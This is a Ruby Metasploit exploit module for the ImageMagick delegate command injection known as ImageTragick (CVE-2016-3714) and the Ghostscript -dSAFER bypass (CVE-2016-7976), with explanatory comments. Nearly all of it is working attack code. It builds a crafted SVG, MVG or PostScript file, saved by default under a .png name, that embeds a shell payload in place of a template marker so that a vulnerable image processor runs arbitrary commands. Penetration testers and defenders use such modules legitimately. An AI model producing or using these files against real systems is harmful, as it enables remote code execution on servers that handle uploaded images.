##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format module for the ImageMagick delegate command injection
# ("ImageTragick", CVE-2016-3714) and the related Ghostscript -dSAFER
# bypass (CVE-2016-7976) used by the PS target.
#
# The module does no network I/O: `exploit` fills a pre-built template
# from the framework data directory with the encoded command payload and
# writes it to FILENAME via Msf::Exploit::FILEFORMAT#file_create.
# Affected versions and upstream fix commits are listed in the metadata
# below; the References URLs point at the advisories and the fixes.
class MetasploitModule < Msf::Exploit
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  # Registers module metadata (name, description, references, targets,
  # payload constraints) and the two datastore options this module reads.
  #
  # @param info [Hash] metadata passed in by the framework and merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'ImageMagick Delegate Arbitrary Command Execution',
      'Description' => %q{
        This module exploits a shell command injection in the way "delegates"
        (commands for converting files) are processed in ImageMagick versions
        <= 7.0.1-0 and <= 6.9.3-9 (legacy).

        Since ImageMagick uses file magic to detect file format, you can create
        a .png (for example) which is actually a crafted SVG (for example) that
        triggers the command injection.

        The PostScript (PS) target leverages a Ghostscript -dSAFER bypass
        (discovered by taviso) to achieve RCE in the Ghostscript delegate.
        Ghostscript versions 9.18 and later are affected. This target is
        provided as is and will not be updated to track additional vulns.

        If USE_POPEN is set to true, a |-prefixed command will be used for the
        exploit. No delegates are involved in this exploitation.
      },
      'Author' => [
        'stewie', # Vulnerability discovery
        'Nikolay Ermishkin', # Vulnerability discovery
        'Tavis Ormandy', # Vulnerability discovery
        'wvu', # Metasploit module
        'hdm' # Metasploit module
      ],
      'References' => [
        %w{CVE 2016-3714},
        %w{CVE 2016-7976},
        %w{URL https://imagetragick.com/},
        %w{URL https://seclists.org/oss-sec/2016/q2/205},
        %w{URL https://seclists.org/oss-sec/2016/q3/682},
        %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
        %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456},
        %w{URL http://permalink.gmane.org/gmane.comp.security.oss.general/19669}
      ],
      'DisclosureDate' => '2016-05-03',
      'License' => MSF_LICENSE,
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Privileged' => false,
      'Payload' => {
        # The payload is spliced into a quoted shell context inside the
        # template, so quote and backslash characters must be avoided.
        'BadChars' => "\x22\x27\x5c" # ", ', and \
      },
      # Each target carries the template filename looked up by #template;
      # the same name exists under both the 'popen' and 'delegate'
      # template directories (see #template).
      'Targets' => [
        ['SVG file', template: 'msf.svg'], # convert msf.png msf.svg
        ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg
        ['PS file', template: 'msf.ps'] # PoC from taviso
      ],
      'DefaultTarget' => 0,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [],
        'Reliability' => [],
        'AKA' => ['ImageTragick'],
        'RelatedModules' => [
          'exploit/unix/fileformat/ghostscript_type_confusion',
          'exploit/multi/fileformat/ghostscript_failed_restore'
        ]
      }
    ))

    # FILENAME: output path for the generated file (default msf.png).
    # USE_POPEN: selects the 'popen' template set instead of 'delegate';
    # defaults to true, so the popen vector is used unless disabled.
    register_options([
      OptString.new('FILENAME', [true, 'Output file', 'msf.png']),
      OptBool.new('USE_POPEN', [false, 'Use popen() vector', true])
    ])
  end

  # Builds the output file: loads the template for the selected target,
  # substitutes the encoded payload for the PoC marker, and writes it out.
  #
  # @return [void] side effect only (file written by file_create)
  def exploit
    # NOTE: the local `p` shadows Kernel#p for the rest of this method.
    if target.name == 'SVG file'
      # SVG templates are XML, so the payload is entity-encoded before it
      # is embedded; the other targets take the encoded payload verbatim.
      p = Rex::Text.html_encode(payload.encoded)
    else
      p = payload.encoded
    end

    # String#sub replaces only the first occurrence of the marker; if the
    # template does not contain it, the template is written unchanged.
    file_create(template.sub('echo vulnerable > /dev/tty', p))
  end

  # Reads the template file for the current target from the framework
  # data directory: data/exploits/imagemagick/<popen|delegate>/<target template>.
  #
  # @return [String] the raw template contents
  # @raise fails the module with Failure::NoTarget when the file is missing;
  #   I/O errors other than Errno::ENOENT are not rescued and propagate.
  def template
    if datastore['USE_POPEN']
      t = 'popen'
    else
      t = 'delegate'
    end

    begin
      # target[:template] is the `template:` entry from the Targets list.
      File.read(File.join(
        Msf::Config.data_directory, 'exploits', 'imagemagick', t,
        target[:template]
      ))
    rescue Errno::ENOENT
      fail_with(Failure::NoTarget, "Target has no #{t} support")
    end
  end
end